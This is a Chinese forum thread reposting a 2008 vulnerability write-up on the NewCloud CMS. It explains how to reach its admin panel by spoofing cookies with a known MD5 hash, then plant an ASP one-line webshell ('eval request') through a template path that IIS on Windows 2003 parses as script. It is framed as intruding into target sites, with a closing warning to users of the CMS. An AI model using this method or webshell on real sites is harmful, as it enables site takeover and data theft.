服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

dirtysea 发表于 2008-11-5 05:28:44

新云网站管理系统后台WEBSHELL漏洞

<STRONG><FONT size=2>
<TABLE cellSpacing=0 cellPadding=0>
<TBODY>
<TR>
<TD>
<DIV id=textstyle_1 style="FONT-SIZE: 9pt; OVERFLOW: hidden; WORD-BREAK: break-all; TEXT-INDENT: 0px; WORD-WRAP: break-word">新云网站管理系统后台WEBSHELL漏洞<BR>文章作者:HaoSec.TS<BR>漏洞发布:好安全网<BR>宣 言:打造中国互联网安全长城<BR>漏洞形成:过滤不严密<BR>危 害:获得MD5,攻陷整个网站。<BR>影响范围:全ACCESS版本,SQL未测试。<BR><BR>新云网站管理系统是现在比较流行的CMS系统,功能也算强大,但由于ASP语言本身的安全环境不是很好,所以漏洞多多也不新鲜,我这里一共发现了两个安全隐患,应该说是致命的。<BR>一、COOKIES欺骗,进入后台。<BR>大家都知道,一般的后台密码都是MD5加密的,如果管理员把密码设置的复杂一点,即使你在聪明,恐怕也要用个一年半载才能破解出来,但其实,新云的后台只要知道MD5的值就可以进入,这也是一般的ASP程序经常有的情况。<BR>方法就是在本地搭设一个相同版本的新云站点,然后用COOKIES修改浏览器,先进入本地的新云管理后台,然后修改COOKIES ,将账号、密码、网址都改成待入侵网站的就可以了,一回车,你就会发现我们已经成功的进入了待入侵网站的后台。<BR>这个方法比较简单,也常见,我就不多说了,我的是下面的后台如何取得WEBSHELL.<BR>二、后台拿WEBSHELL(系统2003)<BR>我们点击模板管理,新建一个模板,名称随便,但注意模板路径一定要是"1.asp"这类,因为2003会把1.asp解析成为文件夹,新建完成之后我们会看到网站根目录下面会生成一个1.asp的文件夹,这时我们点击编辑CSS样式,我们将整个代码都用&lt;%eval request("haosec")%&gt;替换掉,然后点击保存。<BR>这时你会发现,在1.asp文件夹下面会新建一个文件style.css,里面的内容就是一句话了。我们将http://my/1.asp/style.css用LACKER2一句话进行连接,可以看到已经连接成功。<BR>这样我们就得到了一个WEBSHELL.<BR>其实漏洞形成的原因无非就是过滤不严密造成的,使用新云的朋友一定要保护好数据库和后台,否则你就惨喽。</DIV></TD></TR></TBODY></TABLE></FONT></STRONG>

dirtysea 发表于 2006-6-15 23:08:33

re:新云网站管理系统后台WEBSHELL漏洞

<P>早说出来我就不会有失恋的痛苦了!</P>
页: [1]
查看完整版本: 新云网站管理系统后台WEBSHELL漏洞